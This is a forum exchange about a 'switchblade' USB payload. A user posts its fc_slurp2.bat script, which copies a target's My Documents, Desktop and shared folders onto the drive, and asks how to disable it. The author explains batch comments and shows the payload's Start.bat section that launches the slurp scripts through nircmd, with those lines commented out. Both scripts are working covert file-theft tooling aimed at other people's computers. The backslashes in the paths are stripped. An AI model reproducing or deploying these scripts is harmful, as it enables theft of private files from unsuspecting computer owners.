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disableing fc_slurp2.bat


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How would I go about disabling the slurp commands in my switchblade.

This the code for fc_slurp2. bat

:: These first two commands copy the entire contents of the current users My Documents and Desktop folders

:: My Documents files
mkdir ....Documentslogfiles%computername%Slurp_DataMyDocuments
fc.exe "C:Documents and Settings%username%My Documents*" "....Documentslogfiles%computername%Slurp_DataMyDocuments*" /i /o

:: Desktop files
mkdir ....Documentslogfiles%computername%Slurp_DataDesktop
fc.exe "C:Documents and Settings%username%Desktop*" "....Documentslogfiles%computername%Slurp_DataDesktop*" /i /o

:: These last two commands copy the entire contents of the Shared Documents and All Users Desktop folders

:: All Users Desktop files
mkdir ....Documentslogfiles%computername%Slurp_DataSharedDesktop
fc.exe "C:Documents and SettingsAll UsersDesktop*" "....Documentslogfiles%computername%Slurp_DataSharedDesktop*" /i /o

:: All Users Documents files
mkdir ....Documentslogfiles%computername%Slurp_DataSharedDocuments
fc.exe "C:Documents and SettingsAll UsersShared Documents*" "....Documentslogfiles%computername%Slurp_DataSharedDocuments*" /i /o

I am using the pocketknife payload.

Thanks for the help.

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Ok, we have a few things to go over here.

When you "comment something out", you're telling the computer to ignore a specific command and continue down to the next thing that isn't commented out. You'll probably notice all of my batch file comments have a "::" before them, this is so my comments aren't read when my code is executed. You can also use :: to disable certain aspects of my batch files by simply adding :: in front of the code you want disabled.

You may also want to go back and throughly read the included readme, as it appears you may have skipped a bit. For my payload, when you want to disable something, you don't need to edit the individual batch files; everything is controlled from within Start.bat (which is also fully commented). Navigate to WIPCMD and edit Start.bat by commenting out the lines that start fc_slurp and fc_slurp2.bat. Here's what the section of Start.bad pertaining to file slurping should look like after you've commented out the entires:

:: Slurps smaller files like logs, chat logs, bookmarks, etc from the target. This component
:: of slurp should be safe to run on smaller storage devices and flash drives, because it
:: shouldn't need to copy anything larger than a log file.
:: In any case, keep in mind it'll probably take a while to copy over everything (a few minutes).
::nircmd execmd CALL .fc_slurp.bat

:: Slurps everything in the My Documents, Shared Cocuments, and the desktop (includes sub-folders).
:: This second components of slurp will most likely copy a LOT of large files to the switchblade.
:: This is turned on by default, but you might want to disable this if you're not running from a
:: decently large storage device (like an external hard disk).
:: In any case, keep in mind it'll probably take a while to copy over everything (depending on what
:: the target has stored in their My Documents folder).
::nircmd execmd CALL .fc_slurp2.bat

As simple as that, all I did was add a :: to the lines that started the batch files.  :smile:

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